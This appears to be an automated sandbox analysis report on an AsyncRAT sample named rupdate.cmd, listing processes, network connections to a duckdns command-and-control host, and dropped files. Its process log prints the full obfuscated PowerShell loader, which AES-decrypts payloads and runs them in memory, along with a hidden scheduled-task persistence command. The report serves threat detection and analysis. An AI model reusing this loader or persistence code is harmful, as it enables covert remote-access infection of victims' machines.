Analysis Overview
SHA256
ff563d075c5fc7628d94f0d8e4c3d594bb1cefb40faa995211d5bd854f87573b
Threat Level: Known bad
The file rupdate.cmd was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Async RAT payload
Blocklisted process makes network request
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-03-11 20:01
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-11 20:01
Reported
2024-03-11 20:04
Platform
win7-20231129-en
Max time kernel
120s
Max time network
121s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\rupdate.cmd"
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\rupdate.cmd
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\rupdate.cmd';$LFwP='LQNtJoaQNtJdQNtJ'.Replace('QNtJ', ''),'MaUuFginUuFgMoUuFgdulUuFgeUuFg'.Replace('UuFg', ''),'DecZyHQomZyHQpZyHQreZyHQsZyHQsZyHQ'.Replace('ZyHQ', ''),'GetTcXjCuTcXjrrTcXjenTcXjtPTcXjrTcXjoceTcXjssTcXj'.Replace('TcXj', ''),'CrUcRReaUcRRteUcRRDeUcRRcUcRRrypUcRRtorUcRR'.Replace('UcRR', ''),'SplUzbpitUzbp'.Replace('Uzbp', ''),'CsyNPhansyNPgesyNPEsyNPxtesyNPnssyNPisyNPonsyNP'.Replace('syNP', ''),'EFsAOnFsAOtFsAOryPFsAOoFsAOintFsAO'.Replace('FsAO', ''),'FroJsEmmBaJsEmse6JsEm4SJsEmtriJsEmngJsEm'.Replace('JsEm', ''),'TrxpRKanxpRKsxpRKfoxpRKrxpRKmxpRKFixpRKnaxpRKlBlxpRKockxpRK'.Replace('xpRK', ''),'CoQQaApyTQQaAoQQaA'.Replace('QQaA', ''),'ReaRwuAdLiRwuAnRwuAesRwuA'.Replace('RwuA', ''),'EltBEnetBEnmentBEnttBEnAttBEn'.Replace('tBEn', ''),'Invsdpvosdpvkesdpv'.Replace('sdpv', '');powershell -w hidden;function vWWlW($sWOtr){$LeffD=[System.Security.Cryptography.Aes]::Create();$LeffD.Mode=[System.Security.Cryptography.CipherMode]::CBC;$LeffD.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$LeffD.Key=[System.Convert]::($LFwP[8])('7d4AFjj4qrImXG7jYt74EelSDmn179g+v8W/gWHYD+w=');$LeffD.IV=[System.Convert]::($LFwP[8])('h4A9PoLMYbrcJ9FDgep5DQ==');$BWzRm=$LeffD.($LFwP[4])();$RZsbQ=$BWzRm.($LFwP[9])($sWOtr,0,$sWOtr.Length);$BWzRm.Dispose();$LeffD.Dispose();$RZsbQ;}function uxFCF($sWOtr){$AxWJf=New-Object System.IO.MemoryStream(,$sWOtr);$ufEMe=New-Object System.IO.MemoryStream;$pwlbZ=New-Object System.IO.Compression.GZipStream($AxWJf,[IO.Compression.CompressionMode]::($LFwP[2]));$pwlbZ.($LFwP[10])($ufEMe);$pwlbZ.Dispose();$AxWJf.Dispose();$ufEMe.Dispose();$ufEMe.ToArray();}$ARkNi=[System.IO.File]::($LFwP[11])([Console]::Title);$qWGdG=uxFCF (vWWlW ([Convert]::($LFwP[8])([System.Linq.Enumerable]::($LFwP[12])($ARkNi, 5).Substring(2))));$cpVwN=uxFCF (vWWlW ([Convert]::($LFwP[8])([System.Linq.Enumerable]::($LFwP[12])($ARkNi, 6).Substring(2))));[System.Reflection.Assembly]::($LFwP[0])([byte[]]$cpVwN).($LFwP[7]).($LFwP[13])($null,$null);[System.Reflection.Assembly]::($LFwP[0])([byte[]]$qWGdG).($LFwP[7]).($LFwP[13])($null,$null); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Network
Files
memory/2868-4-0x000000001B8A0000-0x000000001BB82000-memory.dmp
memory/2868-5-0x0000000001E00000-0x0000000001E08000-memory.dmp
memory/2868-6-0x000007FEF52A0000-0x000007FEF5C3D000-memory.dmp
memory/2868-7-0x0000000002D80000-0x0000000002E00000-memory.dmp
memory/2868-8-0x000007FEF52A0000-0x000007FEF5C3D000-memory.dmp
memory/2868-9-0x0000000002D80000-0x0000000002E00000-memory.dmp
memory/2868-11-0x0000000002D80000-0x0000000002E00000-memory.dmp
memory/2868-10-0x0000000002D80000-0x0000000002E00000-memory.dmp
memory/2868-12-0x000007FEF52A0000-0x000007FEF5C3D000-memory.dmp
memory/2868-13-0x0000000002D80000-0x0000000002E00000-memory.dmp
memory/2868-14-0x0000000002D80000-0x0000000002E00000-memory.dmp
memory/2868-15-0x0000000002D80000-0x0000000002E00000-memory.dmp
memory/2868-16-0x0000000002D80000-0x0000000002E00000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-11 20:01
Reported
2024-03-11 20:04
Platform
win10v2004-20240226-en
Max time kernel
142s
Max time network
156s
Command Line
Signatures
AsyncRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rupdate.cmd"
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\rupdate.cmd
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\rupdate.cmd';$LFwP='LQNtJoaQNtJdQNtJ'.Replace('QNtJ', ''),'MaUuFginUuFgMoUuFgdulUuFgeUuFg'.Replace('UuFg', ''),'DecZyHQomZyHQpZyHQreZyHQsZyHQsZyHQ'.Replace('ZyHQ', ''),'GetTcXjCuTcXjrrTcXjenTcXjtPTcXjrTcXjoceTcXjssTcXj'.Replace('TcXj', ''),'CrUcRReaUcRRteUcRRDeUcRRcUcRRrypUcRRtorUcRR'.Replace('UcRR', ''),'SplUzbpitUzbp'.Replace('Uzbp', ''),'CsyNPhansyNPgesyNPEsyNPxtesyNPnssyNPisyNPonsyNP'.Replace('syNP', ''),'EFsAOnFsAOtFsAOryPFsAOoFsAOintFsAO'.Replace('FsAO', ''),'FroJsEmmBaJsEmse6JsEm4SJsEmtriJsEmngJsEm'.Replace('JsEm', ''),'TrxpRKanxpRKsxpRKfoxpRKrxpRKmxpRKFixpRKnaxpRKlBlxpRKockxpRK'.Replace('xpRK', ''),'CoQQaApyTQQaAoQQaA'.Replace('QQaA', ''),'ReaRwuAdLiRwuAnRwuAesRwuA'.Replace('RwuA', ''),'EltBEnetBEnmentBEnttBEnAttBEn'.Replace('tBEn', ''),'Invsdpvosdpvkesdpv'.Replace('sdpv', '');powershell -w hidden;function vWWlW($sWOtr){$LeffD=[System.Security.Cryptography.Aes]::Create();$LeffD.Mode=[System.Security.Cryptography.CipherMode]::CBC;$LeffD.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$LeffD.Key=[System.Convert]::($LFwP[8])('7d4AFjj4qrImXG7jYt74EelSDmn179g+v8W/gWHYD+w=');$LeffD.IV=[System.Convert]::($LFwP[8])('h4A9PoLMYbrcJ9FDgep5DQ==');$BWzRm=$LeffD.($LFwP[4])();$RZsbQ=$BWzRm.($LFwP[9])($sWOtr,0,$sWOtr.Length);$BWzRm.Dispose();$LeffD.Dispose();$RZsbQ;}function uxFCF($sWOtr){$AxWJf=New-Object System.IO.MemoryStream(,$sWOtr);$ufEMe=New-Object System.IO.MemoryStream;$pwlbZ=New-Object System.IO.Compression.GZipStream($AxWJf,[IO.Compression.CompressionMode]::($LFwP[2]));$pwlbZ.($LFwP[10])($ufEMe);$pwlbZ.Dispose();$AxWJf.Dispose();$ufEMe.Dispose();$ufEMe.ToArray();}$ARkNi=[System.IO.File]::($LFwP[11])([Console]::Title);$qWGdG=uxFCF (vWWlW ([Convert]::($LFwP[8])([System.Linq.Enumerable]::($LFwP[12])($ARkNi, 5).Substring(2))));$cpVwN=uxFCF (vWWlW ([Convert]::($LFwP[8])([System.Linq.Enumerable]::($LFwP[12])($ARkNi, 6).Substring(2))));[System.Reflection.Assembly]::($LFwP[0])([byte[]]$cpVwN).($LFwP[7]).($LFwP[13])($null,$null);[System.Reflection.Assembly]::($LFwP[0])([byte[]]$qWGdG).($LFwP[7]).($LFwP[13])($null,$null); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\rupdate')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 62112' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\strt.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\strt.cmd"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\strt.cmd"
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\strt.cmd';$LFwP='LQNtJoaQNtJdQNtJ'.Replace('QNtJ', ''),'MaUuFginUuFgMoUuFgdulUuFgeUuFg'.Replace('UuFg', ''),'DecZyHQomZyHQpZyHQreZyHQsZyHQsZyHQ'.Replace('ZyHQ', ''),'GetTcXjCuTcXjrrTcXjenTcXjtPTcXjrTcXjoceTcXjssTcXj'.Replace('TcXj', ''),'CrUcRReaUcRRteUcRRDeUcRRcUcRRrypUcRRtorUcRR'.Replace('UcRR', ''),'SplUzbpitUzbp'.Replace('Uzbp', ''),'CsyNPhansyNPgesyNPEsyNPxtesyNPnssyNPisyNPonsyNP'.Replace('syNP', ''),'EFsAOnFsAOtFsAOryPFsAOoFsAOintFsAO'.Replace('FsAO', ''),'FroJsEmmBaJsEmse6JsEm4SJsEmtriJsEmngJsEm'.Replace('JsEm', ''),'TrxpRKanxpRKsxpRKfoxpRKrxpRKmxpRKFixpRKnaxpRKlBlxpRKockxpRK'.Replace('xpRK', ''),'CoQQaApyTQQaAoQQaA'.Replace('QQaA', ''),'ReaRwuAdLiRwuAnRwuAesRwuA'.Replace('RwuA', ''),'EltBEnetBEnmentBEnttBEnAttBEn'.Replace('tBEn', ''),'Invsdpvosdpvkesdpv'.Replace('sdpv', '');powershell -w hidden;function vWWlW($sWOtr){$LeffD=[System.Security.Cryptography.Aes]::Create();$LeffD.Mode=[System.Security.Cryptography.CipherMode]::CBC;$LeffD.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$LeffD.Key=[System.Convert]::($LFwP[8])('7d4AFjj4qrImXG7jYt74EelSDmn179g+v8W/gWHYD+w=');$LeffD.IV=[System.Convert]::($LFwP[8])('h4A9PoLMYbrcJ9FDgep5DQ==');$BWzRm=$LeffD.($LFwP[4])();$RZsbQ=$BWzRm.($LFwP[9])($sWOtr,0,$sWOtr.Length);$BWzRm.Dispose();$LeffD.Dispose();$RZsbQ;}function uxFCF($sWOtr){$AxWJf=New-Object System.IO.MemoryStream(,$sWOtr);$ufEMe=New-Object System.IO.MemoryStream;$pwlbZ=New-Object System.IO.Compression.GZipStream($AxWJf,[IO.Compression.CompressionMode]::($LFwP[2]));$pwlbZ.($LFwP[10])($ufEMe);$pwlbZ.Dispose();$AxWJf.Dispose();$ufEMe.Dispose();$ufEMe.ToArray();}$ARkNi=[System.IO.File]::($LFwP[11])([Console]::Title);$qWGdG=uxFCF (vWWlW ([Convert]::($LFwP[8])([System.Linq.Enumerable]::($LFwP[12])($ARkNi, 5).Substring(2))));$cpVwN=uxFCF (vWWlW ([Convert]::($LFwP[8])([System.Linq.Enumerable]::($LFwP[12])($ARkNi, 6).Substring(2))));[System.Reflection.Assembly]::($LFwP[0])([byte[]]$cpVwN).($LFwP[7]).($LFwP[13])($null,$null);[System.Reflection.Assembly]::($LFwP[0])([byte[]]$qWGdG).($LFwP[7]).($LFwP[13])($null,$null); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\strt')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 62112' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\strt.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1028 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 13.107.253.67:443 | tcp | |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | momentdhs.duckdns.org | udp |
| GB | 154.30.255.175:8897 | momentdhs.duckdns.org | tcp |
| US | 8.8.8.8:53 | 175.255.30.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 209.80.50.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jvp3zyqb.5ld.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1728-5-0x00000119B4740000-0x00000119B4762000-memory.dmp
memory/1728-10-0x00007FFFD5EF0000-0x00007FFFD69B1000-memory.dmp
memory/1728-11-0x00000119B4630000-0x00000119B4640000-memory.dmp
memory/1728-12-0x00000119B4630000-0x00000119B4640000-memory.dmp
memory/1728-13-0x00000119B4B60000-0x00000119B4BA4000-memory.dmp
memory/1728-14-0x00000119B4C30000-0x00000119B4CA6000-memory.dmp
memory/932-15-0x00007FFFD5EF0000-0x00007FFFD69B1000-memory.dmp
memory/932-16-0x000002C1B34C0000-0x000002C1B34D0000-memory.dmp
memory/932-17-0x000002C1B34C0000-0x000002C1B34D0000-memory.dmp
memory/932-27-0x000002C1B34C0000-0x000002C1B34D0000-memory.dmp
memory/932-30-0x00007FFFD5EF0000-0x00007FFFD69B1000-memory.dmp
memory/1728-31-0x00000119B4B30000-0x00000119B4B3A000-memory.dmp
memory/1728-32-0x00007FFFD5EF0000-0x00007FFFD69B1000-memory.dmp
memory/1728-33-0x00000119B4B40000-0x00000119B4B50000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 3f01549ee3e4c18244797530b588dad9 |
| SHA1 | 3e87863fc06995fe4b741357c68931221d6cc0b9 |
| SHA256 | 36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a |
| SHA512 | 73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50 |
memory/2440-35-0x00007FFFD5EF0000-0x00007FFFD69B1000-memory.dmp
memory/1728-36-0x00000119B4630000-0x00000119B4640000-memory.dmp
memory/1728-42-0x00000119B4630000-0x00000119B4640000-memory.dmp
memory/2440-47-0x0000022DA8F80000-0x0000022DA8F90000-memory.dmp
memory/2440-48-0x0000022DA8F80000-0x0000022DA8F90000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | a26df49623eff12a70a93f649776dab7 |
| SHA1 | efb53bd0df3ac34bd119adf8788127ad57e53803 |
| SHA256 | 4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245 |
| SHA512 | e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c |
memory/2440-52-0x00007FFFD5EF0000-0x00007FFFD69B1000-memory.dmp
memory/2508-53-0x00007FFFD5EF0000-0x00007FFFD69B1000-memory.dmp
memory/2508-54-0x000001975D5F0000-0x000001975D600000-memory.dmp
memory/2508-55-0x000001975D5F0000-0x000001975D600000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cc2ce575753731574bf10ff6e5162032 |
| SHA1 | b660e5156f97af770e5d359fdd2a6ea697f359fb |
| SHA256 | c0c37fd6fb26d101e347a1e9b5190029bb591d8c57392dbf2df4741b11fc2dfa |
| SHA512 | 715bb49c3977d51ff39b0458b99c5e3ba786e3110a4015402cd023b484ff385704475238fb813d074524d76bc733b0d4e92b57b64d187b3d6a664e4f38eebc1b |
memory/2508-66-0x000001975D5F0000-0x000001975D600000-memory.dmp
memory/2508-67-0x000001975D5F0000-0x000001975D600000-memory.dmp
memory/2508-69-0x00007FFFD5EF0000-0x00007FFFD69B1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 2d1de0141861c4d15f5dc0630d1b8c94 |
| SHA1 | 523a8ce3c9a1d5058f77cda094ffd171ff3e4ab8 |
| SHA256 | 94738f7eb08a96b49fb7c51091083b9401b99e4db6458625bd3f1f6c65838c36 |
| SHA512 | 354f89f30f47d909c953d0451d8f1f850f585cd8580241c46d62fbdd3089ddbe3775fe7e531abb9a766683477a32116a52bffe0aa8f7b1d443edfa8baf592498 |
C:\Users\Admin\AppData\Roaming\strt.cmd
| MD5 | e2c6aa50d199d28c6c91c31f4a0cecad |
| SHA1 | 281110edb18aa02b0f7bda95842bbfc89fa18df3 |
| SHA256 | ff563d075c5fc7628d94f0d8e4c3d594bb1cefb40faa995211d5bd854f87573b |
| SHA512 | 769f9fdff4bb299047733cc899303b1c4af2db0c72dba2aa13c7f1635c8256ee3e06a5ff46755f6c337fb4a87ae0c6d07288cc21fba84d2fa54800a8553a75cf |
memory/3544-74-0x00007FFFD5EF0000-0x00007FFFD69B1000-memory.dmp
memory/3544-75-0x0000022B1A350000-0x0000022B1A360000-memory.dmp
memory/3544-81-0x0000022B1A350000-0x0000022B1A360000-memory.dmp
memory/3544-87-0x0000022B1A350000-0x0000022B1A360000-memory.dmp
memory/1728-88-0x00007FFFD5EF0000-0x00007FFFD69B1000-memory.dmp
memory/2528-89-0x00007FFFD5EF0000-0x00007FFFD69B1000-memory.dmp
memory/2528-95-0x0000022C640A0000-0x0000022C640B0000-memory.dmp
memory/2528-100-0x0000022C640A0000-0x0000022C640B0000-memory.dmp
memory/2528-102-0x00007FFFD5EF0000-0x00007FFFD69B1000-memory.dmp
memory/4224-103-0x00007FFFD5EF0000-0x00007FFFD69B1000-memory.dmp
memory/4224-104-0x00000270A7FC0000-0x00000270A7FD0000-memory.dmp
memory/4224-114-0x00000270A7FC0000-0x00000270A7FD0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a9c8558fc395b97560496609cfb8c2b9 |
| SHA1 | 4b4245ffc0a5a886d3b1db9bc8621d24e578c39a |
| SHA256 | 45cfc42df83d0e0dbfecaea4d181c5378277dd83a661878412c7daf7d31eff3b |
| SHA512 | 1a41d1b1de9081b3e7b0ed4e3f0104d6207251434c4298e9d9a5257da1bd070e32511fc3093746324c6eea471f38205df95e1768d4531def33c903a8476a1cf1 |
memory/4224-117-0x00007FFFD5EF0000-0x00007FFFD69B1000-memory.dmp
memory/4772-118-0x00007FFFD5EF0000-0x00007FFFD69B1000-memory.dmp
memory/4772-128-0x000001CABD0E0000-0x000001CABD0F0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2114288fdfc8e55f47611663569c81ab |
| SHA1 | b90e27b1223903c32b629ba98f237ff177ccce85 |
| SHA256 | 5d413dcfcf1f7570834cb23652183db100ab5213b4c7a40ac2c8849c2f5bf69a |
| SHA512 | 997e2b423b8b186b8e02114f52f56d560040705a77aa4c837fa49e003116523d049481625c68e2a96b2327f733af02b40b415ac1530a385ddddb4c4b20a8df8d |
memory/3544-130-0x00007FFFD5EF0000-0x00007FFFD69B1000-memory.dmp
memory/3544-131-0x0000022B1A350000-0x0000022B1A360000-memory.dmp
memory/3544-132-0x0000022B1A350000-0x0000022B1A360000-memory.dmp
memory/4772-134-0x00007FFFD5EF0000-0x00007FFFD69B1000-memory.dmp
memory/3544-135-0x0000022B33020000-0x0000022B33036000-memory.dmp
memory/3544-136-0x00007FFFF6CB0000-0x00007FFFF6EA5000-memory.dmp
memory/3544-139-0x00007FFFE1510000-0x00007FFFE1529000-memory.dmp
memory/3544-140-0x00007FFFF6CB0000-0x00007FFFF6EA5000-memory.dmp